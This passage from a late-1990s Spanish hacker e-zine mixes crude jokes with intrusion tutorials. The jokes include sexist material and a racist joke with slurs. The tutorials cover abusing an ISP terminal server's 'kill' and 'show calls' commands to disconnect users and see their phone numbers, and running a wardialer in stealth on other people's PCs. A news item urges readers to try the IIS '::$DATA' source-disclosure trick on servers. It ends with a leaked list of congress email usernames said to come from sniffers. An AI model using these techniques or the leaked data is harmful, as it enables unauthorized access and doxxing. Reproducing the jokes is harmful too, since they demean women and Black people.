"Análisis sistemático del hábito de ir al baño juntas" 4 hrs. 
"Aprende a organizar tu bolso" (con ejercicios prácticos 35 hrs.) 
"Técnicas básicas de aparcamiento" (10 teoría y 75 hrs Prácticas). 
"Nuevos métodos de autoestima" (el wonderbra, con diapositivas 
 panorámicas, terapia grupal 20 hrs.). 
¿Porqué agobiar a tu marido? (Traumas infantiles y sus consecuencias). 
"Inconvenientes de los tacones" (Nunca estarás a la altura de un  
 hombre). 
"Supervivencia I" (¿Dónde esta la llanta de repuesto?). 
"Supervivencia II" (¿Cómo cambiar la llanta?) Se requiere 
 de certificado de haber aprobado Supervivencia I. 
"Supervivencia avanzada"(Comprueba el aceite del coche) Se 
 requiere certificado de haber aprobado Supervivencia I y II. 
"La caja de herramientas" (Esa gran desconocida) Se requiere 
 certificado de haber aprobado Supervivencia I, II y Avanzada. 
¿Que ocurre con tus pechos? (Tu y la gravedad, análisis 
 práctico, el acercamiento al ombligo, etc...). 
"Tu y la depiladora" (El lado masculino de toda mujer, 12 hrs.). 
"El telefono" (cuando decir basta). 
"Conoce tu hábitat natural: La cocina" 13 hrs. 
"No obligues a mentir a tu marido" (Evita preguntar: Cómo me 
 queda??, Estoy guapa??) 13 hrs. 
"Porque fingir el orgasmo?" ( A el no le importa) 5 hrs. 
"Aprende a ser sincera" (Tu tambien te tiras pedos) Terapia de 
 grupo y prácticas 88 hrs. 
"Escaparates" (Como pasar de largo. 38 hrs.). 
"Un dia de compras I" (La tarjeta de credito y su limite). 
"Un dia de compras II" (Porque probarselo todo??, aprende a ser 
 selectiva). 
"Un dia de compras III" (Repartición de la carga, tu tambien 
 puedes llevar peso). 
"Acuptate a ti misma" (El espejo no miente, naciste asi, 15 min. 
 y 1/2.). 
"Expedientes secretos X" (Una mañana Tu y tu madre). 
 Y por ultimo 
"Tu tambien puedes trabajar" 8 hrs. (Materia indispensable para 
 titularse). 



EL SARGENTO RUSO 
================


Esto es una patrulla de soldados rusos al lado de un 
barranco. El sargento esta mirando hacia el fondo del 
precipicio, se gira, y dice: 

- Soldado Ivanov! 
- Señor! 
- Póngase así: 

                        

                              O 
                     *----------------. 
                              |  |    | 
                              |  |    | 
                              |  |    * 
                              |  | 
                        ,-------- 
                        |           | 
                        |           | 
                                    | 
                                    | 



- Eh... si señor! 
- Ahora salte. 
- Perdón? 
- He dicho que salte al barranco, soldado!! 
- Si señor! (y salta) 
El sargento se vuelve a asomar al precipicio, lo mira 
durante un rato, y dice: 
- Brigada Pyetrov! 
- Señor! 
- Muévase tres metros a su izquierda. 
- Si señor. 
- Póngase así: 


                                   * 
                                    | 
                                    | 
                                    | 
                                 O  | 
                              ,-----' 
                             | |  | 
                             | |  | 
                        *----' |  | 
                               |--| 
                               |  | 
                               |  | 
                               |  `----- 
                               | 
                               | 
                               | 



- Si señor! 
- Salte! 
- Si señor! (y salta al barranco) 
El sargento se vuelve a asomar al precipicio, lo mira 
durante un rato, y dice: 
- Soldado Sidorov! 
- Señor! 
- Muévase cinco metros a la derecha y póngase en cuclillas! 
- Si señor! 
- Salte! 
- Si señor! (y salta) 
El sargento analiza de nuevo el fondo del barranco, y dice: 
- Alférez Strogoff! 
- Señor! 
- Póngase así:    
               
                                    *
                                    !
                              O     !
                      *-------------! 
                              |  |   
                              |  |   
                              |  |   
                              |  | 
                        ,-----------. 
                        |            ----- 
                        |            
     

     

En ese momento pasa un jeep cerca del pelotón, y un capitán 
se levanta y grita: 
- Sargento Tchebychevich!!! Esta es la ultima vez que le 
aviso, le formare un consejo de guerra si le vuelvo a 
sorprender jugando con los soldados al Tetris!! 


Colaboración de: Carlos Rodríguez 



VENTILACION ADECUADA EN EL ACTO SEXUAL 
======================================


Esto es un señor cuya esposa no queda nada satisfecha ni 
durante, ni después del acto sexual, así que deciden acudir 
a un experto sexólogo: 

- Mire, el problema de su esposa es de ventilación, en el 
acto sexual su temperatura sube en exceso y eso hace que su 
sistema nervioso se inhiba; por eso no siente nada... yo le 
doy este abanico y mientras ustedes hacen el amor, que 
alguien agite el abanico para ventilar a su mujer. 

Así que el hombre contrata un negro para que les abanique, 
en la primera noche se ponen con el negro abanicando... 

- ¡María! ¿Sientes el placer? ¿Lo sientes? 

- Ay no, Pepe, no siento nada. 

- ¡NEGRO! ¡ABANICA MAS FUERTE! ¿Sientes placer ahora María? 

- No, Pepe, sigo sin sentir nada... 

-¡NEGRO! ¡MAS BRIO AL ABANICO! ¿Qué tal ahora, María? 

- Mal, sigo sin enterarme. 



- Pues ahora verás, negro, dame el abanico y ponte tú. 

El negro empieza a follar con la mujer, que esta vez sí que 
disfruta: 

- ¡AIIII! ¡MAS MAS! ¡SIGUE! 

- ¿Lo ves negro de mierda? Es que no sabes ni abanicar. 


Colaboración de: Jacqueline Miranda, Caracas. 



MICROSOFT VIAGRA
================

Si Bill Gates fuera fabricante de VIAGRA...

1) MS-Viagra todavía estaría en pruebas para ser lanzado!

2) Verías un cupón de "UPGRADE to MS-Viagra2" en cada producto 
de Microsoft

3) El usuario tendría una erección, pero misteriosamente 
acabaría en medio del acto sin motivo aparente.

4) El usuario tendría una erección, mas descubriría aterrorizado 
que no puede obtener un orgasmo... hasta que consiga la versión 
2 de MS-Viagra!

5) Usted toma la pastilla, esta no funciona y usted llama al 
laboratorio para reclamar. Entonces este le convence que usted 
no esta tomando la pastilla correctamente , o con mucha agua, o 
con poca agua, o muy rápido, o muy lento, ...

6) Usted compra MS-Viagra, pero esta viene con un frasco de 
vitamina C con un sabor horrible. Y MS-Viagra solo funciona si 
usted toma la #!&%!!Ñ@$%#! pastilla!

7) Cuando usted toma MS-Viagra , surgen varios efectos 
colaterales : dolores de cabeza, ausencia de sentidos del gusto, 
vista, olfato y otros... que no estaban en las indicaciones.

8) Usted descubre que solo siente atracción por determinadas 
mujeres: las fabricadas por Microsoft!

9) Existiría una versión Shareware de MS-Viagra que activa la 
erección, pero la limita a 30 segundos de uso, además de inhibir 
el orgasmo hasta que registre el producto!!

10) Después de instalada la erección, usted descubriría que no 
puede desinstalarla...

Colaboración de: José G. Ocando G. 


((((((((((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))))))))))))


                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                               #                             #
                               # 7.-Hackeando a Travez de    #
                               #          CTCREUNA           #
                               #                             #
                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


______________________________________________________________________________________ By _AnDyK_


Uhmm.... Estoy reflexionando... Aun no me decido a  escribir esto ... Creo que
nuestra kerida compa¤ia telef¢nica me odiara  por el resto de mi vida... 
Pues bien.. todo sea por el conocimiento y ke sirva de lecci¢n para ke
reparen sus servidores.Por que creen ustedes ke nuestros proveedores de Inet
nos dan las conexiones automatizadas?(Hace click aqu¡ y ya estas dentro) Lo
haran para que sea mas facil para los usuarios... O tratan de ocultarnos
informaci¢n .
No se si has tratado alguna vez con el Hyper terminal de guindous 95 o el
terminal de su versi¢n anterior el llamar al n£mero telef¢nico que te asigna
tu proveedor de inet. Supongamos es el 5551112, ser¡a algo as¡ como:
 
  - Configuras la velocidad de tu modem y su puerto COM. 
  - Bits de datos 8 
  - Paridad ninguna 
  - Bit de parada 1 
  - Control de flujo depende de tu modem 
   
luego comeinza la acci¢n: 

  atz       ' o la cadena de inicializaci¢n de tu modem 
  ok 
  atm0=0    'si kieres ke la llamada sea en forma silenciosa 
  ok 
  atdt5551112 
  Bienvenido a CTC-REUNA 
  login:hacker 
  password: 
  Usuario Aceptado 
  CTCReuna>>                   ' y nos deja en el prompt.. Ke interesante 
  veamos lo ke podemos hacer... Como??? probemos 
  algunos comandos ke funkan en todas partes... 
  
  CTCReuna>>help 


  ?                   Display help information 
  help                   "     "        " 
  quit                Closes terminal server session 
  hangup                 "      "       "       " 
  test                test <phone-number> [ <frame-count> ] [ <optional 
  fields> ] 
  local               Go to local mode 
  remote              remote <station> 
  set                 Set various items. Type 'set ?' for help 
  show                Show various tables. Type 'show ?' for help 
  iproute             Manage IP routes.  Type 'iproute ?' for help 
  slip                SLIP command 
  cslip               Compressed SLIP command 
  ppp                 PPP command 
  menu                Host menu interface 
  telnet              telnet [ -a|-b|-t ] <host-name> [ <port-number> ] 
  tcp                 tcp <host-name> <port-number> 
  ping                ping <host-name> 
  traceroute          Trace route to host.  Type 'traceroute -?' for help 
  rlogin              rlogin [ -l user -ec ] <host-name> 
  kill                kill <session ID> 


                    * Upssssss esto se pone demasiado interesante
  Bueno ya ke estas dentro y con un medio listado de comandos te invito a 
  ke juegues con algunos de ellos. Te dare una lista de los más interesantes 
  
  CTCReuna>>show ? 

  show ?              Display help information 
  show arp            Display the Arp Cache 
  show icmp           Display ICMP information 
  show if             Display Interface info. Type 'show if ?' for help. 
  show ip             Display IP information. Type 'show ip ?' for help. 
  show udp            Display UDP information. Type 'show udp ?' for help. 
  show igmp           Display IGMP information. Type 'show igmp ?' for 
  help. 
  show mrouting       Display MROUTING information. Type 'show mrouting ?' 
                      for help. 
  show ospf           Display OSPF information. Type 'show ospf ?' for 
  help. 
  show tcp            Display TCP information. Type 'show tcp ?' for help. 
  show isdn           Display ISDN events.  Type 'show isdn <line number> 
  show pools          Display the assign address pools. 
  show modems         Display status of all modems. 
  show calls          Display status of calls. 
  show uptime         Display system uptime. 
  show revision       Display system revision. 
  show v.110s         Display status of all v.110 cards. 
  show users          Display concise list of active users 

                    ** Esto si ke se pone bueno.. :DDD 


  show users          te entregara una lista de todos los usuarios conectados 
                      con sus respectivas direcciones ip, velocidad de conexión
                      modem al ke están conectados, session ID y otros.

  show calls          Curiosamente podrás ver desde ke número telefónico llama 
                      cada usuario. Aun no veo la relacion ke hay entre este
                      comando y el anterior. O sea un usuario x con un numero
                      de telefono x pero se ke los numeros son correctos debido
                      a ke en la lista de usuarios veo a personas ke conozco y
                      a mi mismo y en la lista de telefonos veo los respectivos
                      números.

  kill                Este es el más importante y el ke me da más rabia ke este en 
                      uso. Con este pudes desconectar a cualkier usuario. solo
                      pones kill y la session id del usuario a botar y ya esta.
                      (mas eficiente que un nuke;)).
                      Recuerdo ke lo aki expuesto es solo para propositos
                      informativos y no me responsabilizo por lo ke cualkier
                      persona haga. Además este método de joder a alguien es
                      tan fácil ke da verguenza a nuestra comunidad. Cuidado
                      en convertirte en un lamerzillo. 

  telnet              Sirve para conectarse a cualkier sever pero nunca me ha
                      resultado (service not authorized) 
  
  ping                Este todos lo conocen .

  test                Este es otro ke nunca me ha funcionado 



  Este es solo un resumen de lo ke puedes hacer . 
  Hay muchos otros comandos ke examinar y lo dejo a tu propia curiosidad. 
  Cosas como el manejo de los circuitos Frame Relay ver las Tablas de
  direcciones ips , estado de ips y icmps y otros. 

  Bueno despues de todo lo ke he expuesto espero ke ctcreuna no se enoje
  conmigo y ke mejor en perder plata en buscarme lo haga en arreglar sus
  servers.

  Chao y hasta un próximo artículo... :)))) 

  Recomendaciones!!

  Un modo de entrar a modo terminal en win95 es editar las 
  propiedades de la conexi¢n de acceso telef¢nico a redes e ir a configurar
  modem opciones y marcar en Abrir ventana de terminal despues de marcar. 
  despues de entrar tu login y password, y hacer lo ke gustes, 
  escribes en el promt PPP y estas listo para seguir conectado de la forma 
  habitual ke antes siempre lo hac¡as. Lo expuesto en este articulo es
  aplicable a otros proveedores , no con el mismo descaro (KILL) pero hay:))
  .. A caso no has probado el RLOGIN en entelchile ;)) .
  Recuerden nunca perder el sentido Kom£n. 
  Disculpen se¤ores CTCREUNA...     :)))) .


                    _AnDyK_ 
                    andykhack@hotmail.com    


((((((((((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))))))))))))


                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          #                                     #
                          # 8.-Pequeña Introduccion al Phonetag #
                          #        No apto para 3l3373          #
                          #                                     #                                                                      
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_____________________________________________________________________________________ By TAkER



Introduccion de la introduccion .-
==================================

¿Que es phonetag?
- Phonetag es unos de los tantos wardialer que existen en la red , para 
  muchos el mejor!!
¿Que es un Wardialer?
- No no es que halla una guerra a travez del discado telefonico :) , el
  wardialer es un programa que normalmente se utiliza para escanear numeros
  de telefono ... como explicartelo tu le das un numero de partido y otro de
  termino por ejemplo : 2234455 - 2234500 . De esta forma tendria que escanear 
  desde el numero 2234455 hasta el 2234500 , cada vez que encuentre un modem
  o algo interesante , este programa te lo indicara .. pero vaya que no has 
  visto juegos de guerra!!! 


hey I'm Back...
================

Este texto lo empiezo a escribir gracias a un amigo que me pregunto como
diablos se usaba el phonetag..y no es que yo sea el mejor en esto, es 
mas, lo repito, no soy nadie. Pues bien, me imagino que el phonetag 
tendra un archivo de ayuda, pero es que me da tanta pereza ponerme a 
leer los archivos readme.txt y todos esos, que prefiero poner a 
funcionar el programa y empezar a explorar.

Lo primero que explicare sera su utilidad, yo lo utilizo para detectar 
carriers en las lineas telefonicas de mi ciudad, bueno, y que con eso 
pues es bueno encontrar algunos que pueden ser utiles para algunas cosas 
pero no voy a explicar, si ya lo tienes me imagino que deberas saber 
para que necesitas los carriers.

Al correr el programa te debe salir la pantalla principal, a proposito 
no 
vayas a usar cuando estes conectado a la red (ya se que esto es obvio, 
pero ya me paso que me dijeron que no funcionaba y ya se deben imaginar 
porque). Otra cosa, alguien me dijo que al que esta en mi pagina le 
faltaban algunos archivos, pero cuando yo lo baje, no necesite nadas mas 
que lo que venia en el archivo .zip, pero si tenes algun problema con el 
solo me mandas un mail y yo te los mando, o mejor, los incluyo en el zip 
y listo.

Bueno, ahora si, al correr el programa te sale la ventana principal, lo 
primero que necesitaras es crear la lista de telefonos que van a ser 
escaneados, para hacer esto le das click al menu File y entras por 
New Dial List y aparecera la ventana para crear la lista.

Para hacerla pues es facil, puedes seleccionar los numeros a los que 
quieras marcar, hay que tener en cuenta la cantidad de digitos de ti 
ciudad, por ejemplo en mi ciudad son 7, entonces lo que yo hago es 
seleccionar solo los primeros 7 numeros asi:

Si queres marcar todos los telefonos que empiecen por 511 pues pones 511
en las tres primeras casillas y en el resto de casillas pones las x 
hasta completar 7 digitos. Tambien se pueden marcar por ejemplo al 511 y 513 
en la misma lista, colocando 51 en las dos primeras, 1 y 3 en la tercera y 
el resto en x. Creo que no explicare mas sobre como seleccionar los 
numeros.

Asegurate de tener marcada la casilla Shuffled, pues esa se encarga de 
desordenar las lista para que sea mas dificil de detectar por parte de 
la empresa timadora upsss perdon Telefonica local ;-), teniendo esto listo 
le das click en OK para crear la lista. Si te equivocaste en alguna parte le 
das Clear y volves a empezar. 

Teniendo ya la lista pues le das el boton > y el escaneo empezara, para 
detenerlo umm ese creo que no se...>:->. creo que debe ser el rojo.

En la ventana de Busy signals, creo que debes saber que va ahi, pero de 
todas formas lo explicare cuando al marcar la linea se encuentra ocupada pasa 
a formar parte de esta ventana, esto es con el fin de que sean incluidos 
la proxima vez que utilices la lista en cuestion. Para volverlos a marcar 
los seleccionas todos y le das al boton "<-- Move", ya que si no lo 
haces estos numero desapareceran de la lista como si ya hubieran sido marcados.

En la ventana de Captured Screens aparecen los numeros que han dado 
algun carrier, a proposito, no se si ahi cuantan los tonos de fax, si alguien 
sabe me lo puede decir por favor.

Cuando durante el escaneo se encuentra algun carrier este es almacenado 
en un archivo tipo ascii en el  directorio del phonetag, por ejemplo 
suponiendo que el telefono que da el carrier es el 5137470 entonces el archivo sera 
el 5137470.cap.

Ahora vamos al menu de setup, (el de opciones no es muy importante, ya 
que tiene dos posibilidades obvias que son: Reset Modem y Shuffle numbers, 
me imagino que sabras pa' que sirven, si no, busca un diccionario 
Ingles-Espaqol)

En setup se encuantran varias opciones importantes:

Com Port:Para configurar el puerto com en que trabaja el modem, 
	 los puertos normales son el 2 o el 4.

Modem Speed:Pues pa' que..??? a veces hay modems que solo se conectan 
	    a una determinada velocidad.

Word Format:Esta es para...para...bueno, por lo menos debes saber que 
	    es N-8-1 y E-7-1, bit de paridad y todo eso no..??

Dial Speed.:Como el programita trabaja solo con lineas de tonos (por 
	    lo menos a mi me pasa eso) es para configurar cuanto se 
            demora para marcar entre tono y tono.

Modem Speak.:Pues yo casi siempre lo pongo Off para no estar 
             escuchando mientras marca los tonos..

Dial Patience:Este es el tiempo que esperara el programa desde cuando 
              termina de marcar el telefono para recibir el carrier, si 
	      no lo recibe, pues pasa al siguiente.

Random Delay:Este es para configurar aleatoriamente el tiempo que se 
	     demorara el programa para marcar desde que colgo en el 
	     ultimo.

Stealth Mode:Uffff creo que es el mejor, muy util para cuando lo pones 
	     a funcionar en pc's que no son tuyos, si lo pones "on", 
	     programa no se vera funcionando (pero si lo esta), para 
	     ver como va, tenes que correr el programa nuevamente.

Start Dial:Pos que digo, es la hora en la que empezara a marcar, por 
	   decir si te vas de viaje y queres que empiece a escanear a 
	   las 3:00 am...pues...solo lo pones ahi..

Stop Dial:Lo mismo que la anterior, pero para detenerlo.

Startup...:La lista que creaste puede ser guardada en un archivo, y 
           esta sera la que se utilizara para cuando lo configures a marcar 
	   a cierta hora.
Busy retries:Las veces que el programa intentara conectarse a un tel que 
	     encuentre ocupado.

Cuando termines de Configurar todo le das Save, y listo, a 
trabajar...>:->



Suerte en los Escaneos..


And Be prhee..!!!

TAkER

http://www.geocities.com/siliconvalley/hills/8747
u_taker@hotmail.com


((((((((((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))))))))))))



                               ~~~~~~~~~~~~~~~~~~~~~~~~~~
                               #                        #
                               #  9.-  BackDoorS        #
                               #        (NEWS)          # 
                               ~~~~~~~~~~~~~~~~~~~~~~~~~~




Falla de seguridad en Communicator 4.5
======================================

Cuando todavía estaba fresco el lanzamiento de la versión beta del
Communicator 4.5, Netscape Communications informó que detectaron una seria
grieta en el sistema de seguridad del Navigator que afecta algunas
versiones de su browser y que comenzaron a trabajar para resolver el
problema. El defecto, descubierto y acercado a Netscape por el Secure
Internet Programming (SIP) de la Universidad de Princeton, permite a una
aplicación dañina de Java anular los controles de seguridad del browser,
dejando a los usuarios indefensos ante posibles ataques a través de
Internet. "Las consecuencias que puede traer esta falla son graves, ya que
una vez que es penetrada la seguridad del browser no existe más
protección", afirmó Edward Felten, presidente del SIP. Mientras señalaron
que la compañía siempre considera con seriedad cualquier falla que se
origine en sus programas, ejecutivos de Netscape sostuvieron que ésta en
particular es "difícil de explotar" por quienes realizan ataques, pero que
de todas formas comenzaron a trabajar para encontrar una pronta solución.


Otro Software para combatir los Mailbombing y a los Spammers
============================================================

En la eterna pelea entre los spammers nombre con el que se conoce a
quienes envían mails en grandes cantidades a usuarios que no lo
solicitaron- y los antispammers, una compañía lanzó un software que se
podría convertir en una importante arma contra el envío de enormes
cantidades de mails. Bright Light Technologies presentó ayer la versión
beta del Bright Mail, un utilitario que trabaja con las suscripciones de
los proveedores de Internet para detener los bombardeos al rastrear el
lugar de donde provienen para así neutralizarlos. Bright Light opera sobre
una amplia red y, hasta el momento, cuatro importantes proveedoras de
Internet como Concentric, AT&T, EarthLink y Usa.net se han unido a este
sistema. Ray Everett-Church, un abogado que desde hace tiempo combate los
spammers, señaló que "este nuevo software puede no ser la solución
definitiva contra el bombardeo de mails, pero sin dudas es un buen
precedente sobre el cual se debe trabajar para combatir el problema".


Ref: VIRUS "HACKY BIRTHDAY!"
============================

Este mensaje esta siendo distribuido por el Grupo de Investigacion
Sobre Virus de la Universidad de Buenos Aires.

Se ha detectado un troyano (troyano=3Dvirus que se ejecuta
automaticamente bajo ciertas condiciones)en los servidores de e-mail 
de los 3 principales proveedores de accesos a Internet de este pais.

Todo el correo electronico que haya sido enviado a traves de estos
servidores a contagiado con dicho troyano a las maquinas que los
recibieron.

Este virus, por suerte, todavia no se ha activado ya que ha sido
programado para ejecutarse el proximo 31 de julio, al parecer fecha de
nacimiento del autor del virus, un hacker argentino muy conocido por sus
ingresos ilegales a servidores de Internet, bancos e instituciones
gubernamentales cuyo apodo figura en el codigo de programacion del virus
junto a la frase "Hacky Birthday!"

Dadas las complejas tecnicas heuristicas utilizadas en su
programacion no es posible detectarlo con los antivirus mas conocidos.

Fueron probados, sin resultado el ThunderByte, Scan, Norton
Antivirus, MSAV,  F-Prot y el Panda Antivirus. En caso de ejecutarse el
virus en la fecha indicada se transmitira a una direccion de Internet no
identificada (suponemos que la del autor del virus) el login, password,
direcciones DNS y telefono de acceso a Internet que residan en la maquina
infectada  destruyendo  posteriormente la FAT (File Alocation Table)
Primaria y Secundaria del disco rigido dejandolo inutilizable y sin
posibilidades de recuperacion.

Por lo tanto, debido a la cercania de la fecha en la que se
ejecutara  el  virus, y hasta que el Grupo de Investigacion de Virusn
dependiente de la  UBA  (GISVI) encuentre una forma de erradicarlo, NUESTRA
RECOMENDACION ES  MANTENER  APAGADAS TODAS LAS COMPUTADORAS QUE HAYAN
CURSADO E-MAILS POR INTERNET
DURANTE LAS 24 HORAS DEL 31 DE JULIO PROXIMO PARA EVITAR LA
EJECUCION DE  ESTE  TROYANO.

Lamentablemente este virus tiene un contador de tiempo propio que se
activa al infectar la maquina, de manera que NO SIRVE CAMBIAR LA FECHA EN
LA COMPUTADORA PARA EVITAR SU ACTIVACION, como se procede
habitualmente en  estos  casos.

Mientras tanto, rogamos a los que reciben este e-mail trasmitirlo a  todos
aquellos que conozcan que utilicen frecuentemente el correo electronico
de Internet, de manera de poder alertar a la mayor cantidad de usuarios
y  que,  en caso de no encontrar un antivirus que lo neutralice  Quedaremos
en contacto.

Y LOS MARCIANOS SON ROSADOS CHEEE !!!! JEJEJE  ... PlaXiuS :), No sera mucha TELE .-


Agujero de seguridad en NT . Para variar Moco$oft
=================================================

Hackers de todo el mundo entran el servidor Web de Microsoft
¡EXCLUSIVA! Un grupo de "hackers" descubrió el pasado jueves una grave
fisura de seguridad en el servidor web de Microsoft y obtuvo los
"códigos fuente" de las páginas activas en el servidor, realizadas en
"asp" y "perl", pudiendo obtener, de este modo, información confidencial
y contraseñas de acceso a bases de datos de Microsoft. Analizando estos
códigos fuente, los intrusos informáticos pueden entrar en los
servidores web NT que no hayan adoptado en los últimos días extremas
medidas de seguridad. Alrededor del 40 % de servidores web en Internet
utiliza esta plataforma.
Microsoft ha enviado un boletín especial a un buen número de
administradores de sistemas, reconociendo el hecho e instándoles a
adoptar extraordinarias medidas de seguridad. La fisura descubierta por
los hackers se comprobaba colocando los signos ::$DATA después de marcar
una dirección de cualquier página en "asp". En ese momento se abría una
ventana que permitía acceder a los códigos fuente de las páginas del
servidor, según pudo comprobar directamente "La Brújula".
El descubrimiento se difundió por todo el mundo a las 18.24 hora
española, 6.24 AM Pacific, y doce horas después, a las 6.15 hora
española, Microsoft difundió una comunicación especial advirtiendo del
hecho. En esas doce horas de diferencia, cientos de programadores de
todo el mundo obtuvieron archivos de Microsoft, así como de otros
servidores con idénticos problemas de seguridad. La compañía de Bill
Gates también ha habilitado un sitio web:

http://www.microsoft.com/security

facilitando la información. La noticia de este "bug", que ha sido
recogida también por News.com y Wired, ocupa en estos días la atención
de miles de programadores mundiales. Consitituye, asimismo, uno de los
fallos de seguridad más graves de Microsoft en los últimos meses.
(Tomado de LABRUJULA.NET Domingo, 5 julio 1998 y reproducido con el
permiso de Mikel Amigot. Más información en <http://www.imssa.es/>)
******************************************
Agujero de seguridad en ASP
Debido a la importancia de este agujero, que no sólo afecta a los
servidores de Microsoft, sino a todos los que utilicen páginas ASP, doy
a continuación más detalles sobre el mismo.
Basta con añadir "::$DATA" a continuación de una dirección URL en la
ventanita "Dirección"de nuestro navegador, para que en vez de ejecutarse
en el servidor la página de servidor activa (ASP), se descargue en un
archivo su código fuente, en vez del resultado de su ejecución. Si en su
Web se encuentra alguna página de extensión .asp, pueden hacer la prueba
escribiendo:

http://www.tuservidor.es/tupagina.asp::$DATA

y se obtendrá el archivo fuente, no la página producida por su
ejecución. Son vulnerables a este ataque los archivos con las
extensiones .inc, .idc, .stm, .asp, .asa, .shtm, .shtml y .pl en
servidores NT con IIS.
Si se tiene en cuenta que estas páginas se suelen utilizar para
autenticación y control de acceso, así como para gestión y consultas de
bases de datos y que muchas veces en ellas se encuentran codificados los
archivos de claves o incluso las mismas claves, la obtención del código
fuente nos puede permitir hacernos con dichas claves y acceder a los
servicios que protegen.
Por este motivo, resulta de extrema importancia que los administradores
que utilicen páginas activas ASP para proteger sus recursos parcheen el
fallo.
Para una descripción detallada del agujero pueden acudir a:

http://www.activeserverpages.com/security/
http://www.zdnet.com/wsources/content/0798/ntnd_asp_hole.html

Pueden encontrar distintos parches en las siguientes direcciones:

http://www.softwing.com/iisdev/ddatafix/>
http://www.microsoft.com/security/bulletins/ms98-003.htm

Proyecto_R ha probado este fallo y funciona ¡¡
Asi que pruebalo en tu server favorito y te llevaras
grandes sorpresas . Guauu es INCREIBLE y si lo pruebas
ahora te llevaras gratis unos lindos VBScripts . 
Otro producto de TELEOCURRE .


DESINFORMATIVO "Proyecto_R" .-
==============================

*NECESITAMSO PHREAKING O CONOCEDORES DE LOS SISTEMAS TELEFONICOS NACIONAL O EXTRANGEROS QUE
DESEEN APORTAR SUS CONOCIMIENTOS EN ESTE MAGAZINE . INTERESADOS COMUNICARSE
CON EL NI¥O

_AnDyK_
andykphreak@hotmail.com


*A TODOS LOS HACKERS , WANNABES , ETC .. QUE DESEEN MANTENER CONTACTO EN EL
SERVIDOR IRC DALNET , LES RECOMENDAMOS LOS SIGUIENTES CANALES .

#HACKSPAIN
#COLOMBIA-HACK

*NECESITAMOS EXPERTOS PROGRAMADORES , QUE NOS APORTEN CON SUS CONOCIMIENTOS
EN VIRII Y CRACKEO DE SOFTWARE LOS INTERESADOS COMUNICARSE A NUESTRO MAIL .

*ALGUIEN SABE ALGO DEL SUPERHENRY Y BLACKVIRUZ DE PERU NOS AVISE PORFAVOR ;0)
, QUIZAS ESTAN EN CANA ..... , YO LES DIJE LA NASA NO """" JEJE



LISTA DE CORREO "RAREGAZZ"
==========================

Por lo que hemos podido comprobar es la mejor lista de correo (SOBRE HACKING)
en español que existe ; para aclarar tus dudas , la idea es que los usuarios
realizen preguntas y que se contesten entre si ,a la vez puedes informarte de
los ultimos bugs , tecnicas , e incluso hacer contactos !!!!!..

Para inscribirte , manda un correo a :

raregazz@iname.com   con el subjet: suscribe tu@direccion.decorreo

para que te saquen de la lista :

raregazz@iname.com   con el subjet: unsuscribe tu@direccion.decorreo

POR FAVOR SI NO ESTAS SEGURO DE LO QUE SE TRATA , O SOLO QUIERES HACER UN PAR
DE CONSULTAS Y SALIRTE , NO HINCHES NO TE METAS A LA LISTA . ADEMAS LES
ADVERTIMOS QUE TU BUZON DE CORREO PUEDE VERSE INUNDADO DE CORREO , YA QUE LAS
CANTIDADES QUE SE MANEJAN SON REALMENTE EXORBITANTES (NO SERA MUCHO LUCHO) .-

 
((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))
		
                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                        #                         #
                        # 4.-Por Amor O Placer.   #
                        # Manifiesto de la pareja #
                        #     de un computin      #
                        #                         #
                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~
________________________________________________________________________________ By PlaXiuLiNa
		

Asi empezamos , por amor .

Al principio era tierno mirar al niño con juguete nuevo , pero despues pasa
el tiempo y de niño se pasa a adolecente donde lo que le digas le entra por
una oreja y le sale por la otra .
Luego pasan a ser adultos , donde ni siquiera puedes tratar de llevar la
contraria.
Te dejan totalmente a un lado por quien???? , Segun lo que tu entiendes .

Una cosa como la TV , con maquina de escribir incluida ; y tiene una cosa a
la cual le llaman mouse .

Pero como siempre sucede si no puedes con ellos Uneteles ;> 

Al final terminamos en lo mismo ...

POR AMOR O PLACER ...

(((((((((((((((((((((((((((((((((fin))))))))))))))))))))))))))))))))))))))))))


                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                           #                         #
                           # 4.-Log del congreso     #
                           #                         #
                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~

____________________________________________________________________________________ By Anonimo


El siguiente listado nos llego por correo anonimo , Proyecto_R no tiene nada
que ver con lo aki expuesto , no sabemos nada del usuario que nos mando el
correo , ni su nombre ni su apodo . Lo unico que sabemos es que este es el
listado de nombres de E-Mail del servidor del congreso , La persona que envio
este archivo nos indico que no trataramos de rastrearlo pues es imposible
y que tenia varios sniffers instalados en varios servidores del gobierno y que
apenas supiera de algun movimiento corrupto de los señores politicos  , lo
publicaria a travez de nuestro magazine , cosa que haremos ;> con mucho gusto. .

... ASI QUE CUIDADO QUE EL GRAN HERMANO NOS OBSERRVA A TODOS ...

Nombre         User

# Administracion de la Red

Rene.Lucero:rlucero
Erwin.Gaete:egaete
Walter.Grandon:wgrandon
Manuel.Aguilera:manuel 

# Diputados

Mario.Acuna:macuna
Sergio.Aguilo:saguilo
Claudio.Alvarado:alvarado
# -- Pedro.Pablo.Alvarez:alvarez
Andres.Allamand:allamand
Isabel.Allende:iallende
Armando.Arancibia:aranci
Gabriel.Ascencio:ascencio
Nelson.Avila:navila
Andres.Aylwin:aaylwin
Mariana.Aylwin:maylwin
Ignacio.Balbontin:ibalbont
Francisco.Bartolucci:fbartol
Francisco.Bayo:fbayo
Carlos.Bombal:cbombal
Carlos.Caminondo:ccaminon
Carlos.Cantero:ccantero
Alberto.Cardemil:acardemi
Guillermo.Ceroni:gceroni
# -- Juan.Antonio.Coloma:jcoloma
Aldo.Cornejo:acornejo
Sergio.Correa:scorrea
Maria.Angelica:macristi
Andres.Chadwick:chadwick
# -- Ivan.deLamasa:dlamaza
Carlos.Dupre:cdupre
Sergio.Elgueta:selgueta
Ramon.Elizalde:elizalde
Francisco.Encina:fencina
Maximiliano.Errazuriz:merrazu
Camilo.Escalona:escalona
